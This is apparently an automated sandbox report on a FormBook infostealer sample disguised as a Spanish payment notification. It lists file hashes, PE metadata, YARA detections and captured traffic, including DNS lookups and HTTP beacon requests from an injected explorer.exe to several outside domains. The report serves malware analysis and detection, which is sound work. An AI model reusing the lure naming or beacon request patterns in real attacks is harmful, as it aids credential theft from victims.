                                            SHA-256:8BF01E0C445BD07C0B4EDC7199B7E17DAF1CA55CA52D4A6EAC4EF211C2B1A73E
                                            SHA-512:8C04139A1FC3C3BDACB680EC443615A43EB18E73B5A0CFCA644CB4A5E71746B275B3E238DD1A5A205405313E457BB75F9BBB93277C67AFA5D78DCFA30E5DA02B
                                            Malicious:true
                                            Reputation:moderate, very likely benign file
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.9124952245387155
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            • DOS Executable Generic (2002/1) 0.01%
                                            File name:Notificaci#U00f3n de pago.exe
                                            File size:535552
                                            MD5:297e8b7f26a2eb1af366cac0202eca9a
                                            SHA1:4b3e36dcd7ea9785f93e43699e1224ad30626148
                                            SHA256:441ba10d2078c45be3d266523f77b59a1478f61ce09f2097ccc276d534c35855
                                            SHA512:bd53b63f91ecdc33e6dba2929dbe1039df08bc8a84950af9fb2b34fe803c3d61fc09c40ae8843d961e4107e6970690e2ff4d7436ff1d78b7e5aa0b4c87576942
                                            SSDEEP:12288:3GuFJoO8gHHV3PnS2l3wCGeoPzaHkkzXlWaVaGNtl7:rwyHHRS2tPweEkzXRVJ
                                            TLSH:4DB41256A267A933C14A9736CCD855CC5330CF06AC23DA4768E932CC2B73BC64E91B67
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...m.|b..............0.."..........^A... ...`....@.. ....................................@................................

                                            File Icon

                                            Icon Hash:00828e8e8686b000

                                            Static PE Info

                                            General

                                            Entrypoint:0x48415e
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                            Time Stamp:0x627CAF6D [Thu May 12 06:55:41 2022 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:v4.0.30319
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                            Entrypoint Preview

                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x841100x4b.text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x860000x5e0.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x880000xc.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x840c30x1c.text
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000x821640x82200False0.939192333093data7.92135270708IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                            .rsrc0x860000x5e00x600False0.429036458333data4.15748129845IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0x880000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountry
                                            RT_VERSION0x860a00x354data
                                            RT_MANIFEST0x863f40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                            Imports

                                            DLLImport
                                            mscoree.dll_CorExeMain

                                            Version Infos

                                            DescriptionData
                                            Translation0x0000 0x04b0
                                            LegalCopyrightCopyright 2013
                                            Assembly Version0.0.1.0
                                            InternalNameFormatExcept.exe
                                            FileVersion0.0.1.0
                                            CompanyName
                                            LegalTrademarks
                                            Comments
                                            ProductNamePagedOptionsDialog
                                            ProductVersion0.0.1.0
                                            FileDescriptionPagedOptionsDialog
                                            OriginalFilenameFormatExcept.exe

                                            Network Behavior

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            May 13, 2022 16:46:41.088460922 CEST4976080192.168.2.3198.54.117.212
                                            May 13, 2022 16:46:41.261989117 CEST8049760198.54.117.212192.168.2.3
                                            May 13, 2022 16:46:41.264811039 CEST4976080192.168.2.3198.54.117.212
                                            May 13, 2022 16:46:41.271711111 CEST4976080192.168.2.3198.54.117.212
                                            May 13, 2022 16:46:41.445027113 CEST8049760198.54.117.212192.168.2.3
                                            May 13, 2022 16:46:41.445060015 CEST8049760198.54.117.212192.168.2.3
                                            May 13, 2022 16:46:46.520431042 CEST4976180192.168.2.3192.0.78.25
                                            May 13, 2022 16:46:46.539464951 CEST8049761192.0.78.25192.168.2.3
                                            May 13, 2022 16:46:46.539556980 CEST4976180192.168.2.3192.0.78.25
                                            May 13, 2022 16:46:46.539707899 CEST4976180192.168.2.3192.0.78.25
                                            May 13, 2022 16:46:46.556318998 CEST8049761192.0.78.25192.168.2.3
                                            May 13, 2022 16:46:46.708456039 CEST8049761192.0.78.25192.168.2.3
                                            May 13, 2022 16:46:46.708498001 CEST8049761192.0.78.25192.168.2.3
                                            May 13, 2022 16:46:46.708687067 CEST4976180192.168.2.3192.0.78.25
                                            May 13, 2022 16:46:46.964236975 CEST4976180192.168.2.3192.0.78.25
                                            May 13, 2022 16:46:46.980910063 CEST8049761192.0.78.25192.168.2.3
                                            May 13, 2022 16:46:57.439934969 CEST4976480192.168.2.3104.195.7.239
                                            May 13, 2022 16:46:57.627410889 CEST8049764104.195.7.239192.168.2.3
                                            May 13, 2022 16:46:57.627687931 CEST4976480192.168.2.3104.195.7.239
                                            May 13, 2022 16:46:57.630451918 CEST4976480192.168.2.3104.195.7.239
                                            May 13, 2022 16:46:57.818396091 CEST8049764104.195.7.239192.168.2.3
                                            May 13, 2022 16:46:57.818476915 CEST8049764104.195.7.239192.168.2.3
                                            May 13, 2022 16:46:57.818505049 CEST8049764104.195.7.239192.168.2.3
                                            May 13, 2022 16:46:57.818530083 CEST8049764104.195.7.239192.168.2.3
                                            May 13, 2022 16:46:57.818550110 CEST8049764104.195.7.239192.168.2.3
                                            May 13, 2022 16:46:57.818682909 CEST4976480192.168.2.3104.195.7.239
                                            May 13, 2022 16:46:57.818797112 CEST4976480192.168.2.3104.195.7.239
                                            May 13, 2022 16:46:58.006299973 CEST8049764104.195.7.239192.168.2.3
                                            May 13, 2022 16:46:58.006746054 CEST4976480192.168.2.3104.195.7.239

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            May 13, 2022 16:46:41.058917999 CEST5380253192.168.2.38.8.8.8
                                            May 13, 2022 16:46:41.080055952 CEST53538028.8.8.8192.168.2.3
                                            May 13, 2022 16:46:46.489698887 CEST6526653192.168.2.38.8.8.8
                                            May 13, 2022 16:46:46.515434027 CEST53652668.8.8.8192.168.2.3
                                            May 13, 2022 16:46:51.974284887 CEST6333253192.168.2.38.8.8.8
                                            May 13, 2022 16:46:52.015516996 CEST53633328.8.8.8192.168.2.3
                                            May 13, 2022 16:46:57.120481968 CEST6354853192.168.2.38.8.8.8
                                            May 13, 2022 16:46:57.438465118 CEST53635488.8.8.8192.168.2.3
                                            May 13, 2022 16:47:02.828375101 CEST4932753192.168.2.38.8.8.8
                                            May 13, 2022 16:47:02.958780050 CEST53493278.8.8.8192.168.2.3
                                            May 13, 2022 16:47:10.203502893 CEST6138053192.168.2.38.8.8.8
                                            May 13, 2022 16:47:10.370362997 CEST53613808.8.8.8192.168.2.3

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            May 13, 2022 16:46:41.058917999 CEST192.168.2.38.8.8.80xfaa7Standard query (0)www.evertribute.comA (IP address)IN (0x0001)
                                            May 13, 2022 16:46:46.489698887 CEST192.168.2.38.8.8.80x7032Standard query (0)www.theguiriguide.comA (IP address)IN (0x0001)
                                            May 13, 2022 16:46:51.974284887 CEST192.168.2.38.8.8.80x6a9aStandard query (0)www.team-ctctitleco.comA (IP address)IN (0x0001)
                                            May 13, 2022 16:46:57.120481968 CEST192.168.2.38.8.8.80x1c73Standard query (0)www.librevillegabon.comA (IP address)IN (0x0001)
                                            May 13, 2022 16:47:02.828375101 CEST192.168.2.38.8.8.80xe13cStandard query (0)www.triptoasiam.comA (IP address)IN (0x0001)
                                            May 13, 2022 16:47:10.203502893 CEST192.168.2.38.8.8.80x1b3Standard query (0)www.massage-rino.comA (IP address)IN (0x0001)

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            May 13, 2022 16:46:41.080055952 CEST8.8.8.8192.168.2.30xfaa7No error (0)www.evertribute.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                            May 13, 2022 16:46:41.080055952 CEST8.8.8.8192.168.2.30xfaa7No error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                            May 13, 2022 16:46:41.080055952 CEST8.8.8.8192.168.2.30xfaa7No error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                            May 13, 2022 16:46:41.080055952 CEST8.8.8.8192.168.2.30xfaa7No error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                            May 13, 2022 16:46:41.080055952 CEST8.8.8.8192.168.2.30xfaa7No error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                            May 13, 2022 16:46:41.080055952 CEST8.8.8.8192.168.2.30xfaa7No error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                            May 13, 2022 16:46:41.080055952 CEST8.8.8.8192.168.2.30xfaa7No error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                            May 13, 2022 16:46:41.080055952 CEST8.8.8.8192.168.2.30xfaa7No error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                            May 13, 2022 16:46:46.515434027 CEST8.8.8.8192.168.2.30x7032No error (0)www.theguiriguide.comtheguiriguide.comCNAME (Canonical name)IN (0x0001)
                                            May 13, 2022 16:46:46.515434027 CEST8.8.8.8192.168.2.30x7032No error (0)theguiriguide.com192.0.78.25A (IP address)IN (0x0001)
                                            May 13, 2022 16:46:46.515434027 CEST8.8.8.8192.168.2.30x7032No error (0)theguiriguide.com192.0.78.24A (IP address)IN (0x0001)
                                            May 13, 2022 16:46:52.015516996 CEST8.8.8.8192.168.2.30x6a9aName error (3)www.team-ctctitleco.comnonenoneA (IP address)IN (0x0001)
                                            May 13, 2022 16:46:57.438465118 CEST8.8.8.8192.168.2.30x1c73No error (0)www.librevillegabon.com104.195.7.239A (IP address)IN (0x0001)
                                            May 13, 2022 16:47:02.958780050 CEST8.8.8.8192.168.2.30xe13cNo error (0)www.triptoasiam.com162.0.216.71A (IP address)IN (0x0001)
                                            May 13, 2022 16:47:10.370362997 CEST8.8.8.8192.168.2.30x1b3No error (0)www.massage-rino.com38.40.251.97A (IP address)IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • www.evertribute.com
                                            • www.theguiriguide.com
                                            • www.librevillegabon.com

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            0192.168.2.349760198.54.117.21280C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            May 13, 2022 16:46:41.271711111 CEST8613OUTGET /d6fp/?7nxh=0IAMhpyfM6TyxYvNuQBLxFd+VBe1OVp7bFg/8SsVn3OL4Z0v7SAtnQzd8ZWN+7APMfoM&q6AlF=0txdQnwxgb HTTP/1.1
                                            Host: www.evertribute.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            1192.168.2.349761192.0.78.2580C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            May 13, 2022 16:46:46.539707899 CEST8614OUTGET /d6fp/?7nxh=Vjw903Y9bM1AKbFW1pqe+tE50cefuwUzuT8QLR39Zk9vkX5o4NYForbp6qTr1jJAF4yG&q6AlF=0txdQnwxgb HTTP/1.1
                                            Host: www.theguiriguide.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            May 13, 2022 16:46:46.708456039 CEST8614INHTTP/1.1 301 Moved Permanently
                                            Server: nginx
                                            Date: Fri, 13 May 2022 14:46:46 GMT
                                            Content-Type: text/html
                                            Content-Length: 162
                                            Connection: close
                                            Location: https://www.theguiriguide.com/d6fp/?7nxh=Vjw903Y9bM1AKbFW1pqe+tE50cefuwUzuT8QLR39Zk9vkX5o4NYForbp6qTr1jJAF4yG&q6AlF=0txdQnwxgb
                                            X-ac: 2.hhn _dfw
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            2192.168.2.349764104.195.7.23980C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            May 13, 2022 16:46:57.630451918 CEST9314OUTGET /d6fp/?7nxh=27dTALvGagYo6W4eiFO6YvZJ//Zn5pBdCa2l5DH7HNM2RGs4GWZbOB9vu5aCQaLmGkAl&q6AlF=0txdQnwxgb HTTP/1.1
                                            Host: www.librevillegabon.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            May 13, 2022 16:46:57.818396091 CEST9314INHTTP/1.1 200 OK
                                            Transfer-Encoding: chunked
                                            Content-Type: text/html; charset=UTF-8
                                            Server: Nginx Microsoft-HTTPAPI/2.0
                                            X-Powered-By: Nginx
                                            Date: Fri, 13 May 2022 14:46:58 GMT
                                            Connection: close
                                            Data Raw: 33 0d 0a ef bb bf 0d 0a
                                            Data Ascii: 3
                                            May 13, 2022 16:46:57.818476915 CEST9316INData Raw: 31 30 37 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 61 70 70 6c 69 63 61 62 6c 65 2d 64
                                            Data Ascii: 1070<!DOCTYPE html><html><head><meta charset=UTF-8 /><meta name=applicable-device content=pc,mobile /><meta name=viewport content="width=device-width, initial-scale=1" /><style>body{margin:0;padding:0;background:#e6eaeb;font-family:Ari
                                            May 13, 2022 16:46:57.818505049 CEST9317INData Raw: 6c 65 72 74 2d 66 6f 6f 74 65 72 2d 74 65 78 74 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 32 70 78 20 73 6f 6c 69 64 20 23 65 65 65 3b 70 61 64 64 69 6e 67 3a 33 70 78 20 30 20 30 20 35 70 78 3b 68 65 69 67 68 74 3a
                                            Data Ascii: lert-footer-text{float:left;border-left:2px solid #eee;padding:3px 0 0 5px;height:40px;color:#0b85cc;font-size:12px;text-align:left}.alert-footer-text p{color:#7a7a7a;font-size:22px;line-height:18px}</style> </head><body class=ie8><div i
                                            May 13, 2022 16:46:57.818530083 CEST9319INData Raw: 4a 55 43 7c 46 65 6e 6e 65 63 7c 77 4f 53 42 72 6f 77 73 65 72 7c 42 72 6f 77 73 65 72 4e 47 7c 57 65 62 4f 53 7c 53 79 6d 62 69 61 6e 7c 57 69 6e 64 6f 77 73 20 50 68 6f 6e 65 29 2f 69 29 29 29 20 7b 0a 09 09 20 20 20 20 20 20 20 20 77 65 62 75
                                            Data Ascii: JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i))) { weburl = weburl.replace(/\/\/(www\.)*/, '//m.'); } document.getElementById("js-alert-btn").setAttribute("href", weburl); var levelTime = 100;v
                                            May 13, 2022 16:46:57.818550110 CEST9319INData Raw: 75 76 3b 0a 09 09 09 0a 09 09 09 09 09 09 7d 0a 09 09 09 0a 09 09 09 09 09 09 6e 2e 73 74 79 6c 65 2e 73 74 72 6f 6b 65 44 61 73 68 6f 66 66 73 65 74 20 3d 20 37 33 35 20 2d 20 6c 76 3b 0a 09 09 09 09 09 09 69 66 20 28 6c 65 76 65 6c 54 69 6d 65
                                            Data Ascii: uv;}n.style.strokeDashoffset = 735 - lv;if (levelTime == 0) {document.getElementById("js-alert-head").innerHTML = str2;} }
                                            May 13, 2022 16:46:58.006299973 CEST9320INData Raw: 32 35 38 0d 0a 0a 0a 09 09 20 20 20 20 20 20 20 20 7d 2c 20 31 29 3b 0a 09 09 20 20 20 20 7d 29 28 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 5f 68 6d 74 20 3d 20 5f 68 6d 74 20 7c 7c 20 5b 5d 3b 0a 28 66 75 6e
                                            Data Ascii: 258 }, 1); })();</script><script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?876dcf9b8878074e2167aec217d5c0f7"; var s = document.getElementsBy


                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:16:44:56
                                            Start date:13/05/2022
                                            Path:C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe"
                                            Imagebase:0xb90000
                                            File size:535552 bytes
                                            MD5 hash:297E8B7F26A2EB1AF366CAC0202ECA9A
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.310859380.0000000003FFB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.310859380.0000000003FFB000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.310859380.0000000003FFB000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.310331717.0000000002FB8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.310059804.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low

                                            General

                                            Target ID:8
                                            Start time:16:45:17
                                            Start date:13/05/2022
                                            Path:C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe
                                            Imagebase:0xe10000
                                            File size:535552 bytes
                                            MD5 hash:297E8B7F26A2EB1AF366CAC0202ECA9A
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.383574580.0000000001440000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.383574580.0000000001440000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.383574580.0000000001440000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.306288871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.306288871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.306288871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.305178001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.305178001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.305178001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            General

                                            Target ID:11
                                            Start time:16:45:22
                                            Start date:13/05/2022
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\Explorer.EXE
                                            Imagebase:0x7ff6b8cf0000
                                            File size:3933184 bytes
                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.366275281.0000000007136000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.366275281.0000000007136000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.366275281.0000000007136000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.349080967.0000000007136000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.349080967.0000000007136000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
